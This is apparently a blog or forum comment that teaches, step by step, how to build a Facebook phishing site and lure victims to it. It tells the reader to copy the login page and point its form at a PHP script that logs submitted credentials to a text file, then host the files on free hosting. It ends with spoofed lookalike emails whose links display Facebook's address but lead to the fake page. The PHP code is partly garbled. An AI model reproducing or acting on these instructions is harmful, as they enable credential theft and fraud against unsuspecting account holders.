Now I'm goin to make a tutorial on facebook phish !
1stly,
go to"www.facebook.com/login.php" and right click on some white space on the page and press "view source code". A huge text is to appear, copy it all to notepad.
2ndly,
we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press
Edit
, thensearch
. and search "action=" [without the quotes]. u should findThe big red ring that circles
the "action=" you have to change. You have to change itto 'action="next.php" '
. after you have done that, you should change the method (small red circle on the picture) to"get"
instead of"post"
, or else it will not work.Save thedocument as"index.PHP" (not htm!)
3rdly,Now that we change the action to
next.php
, we should also make a"next.php"
. open up notepad again. And write this: $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save this as "next.php"
Note: for security you should rename"passwords.txt" to something else
.now make a text file called
"passwords.txt" or whatever you renamed the file to in the"next.php"
, leave this document blank.4rthly,
Upload the 3 files "index.php","next.php" and"passwords.txt" (or whatever the password file is called) to a subdomain hosting site.
THEY MUST SUPPORT.php
!I suggest these: 110mb.com, spam.comor 007sites.com. When you made an account, you should upload the 3 files.
Congratz. You have yourself a working Phisher site!
5thly,now we would like to
send spoof emails :).
To do that we should first make an email accountwhich starts with facebook@. or something that looks alike.
Like thisFACEB0OK@hotmail.comORsOMeTHing like that.
You should eitheruse Gmail, Live, or hotmail or you could get a mail like this"facebook@noreply.com" soemthing like that.
but eventually that would cost. When your email is set go to step six.6thly,
Copy the content of an original Facebook friendship invitation email and paste it into a new mail.
DONT SENT YET!remove the hyperlink from this link
:http:/www.facebook.com/n/?reqs.php
Mark it and push the 'Add hyperlink button'.
Add hyperlink button in the red circle.
now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.phpbut lead to your phisher page. Now i belive your ready to send your spoof emails to everybody you know.
Gud trick but be careful guyz. ;)
ReplyDelete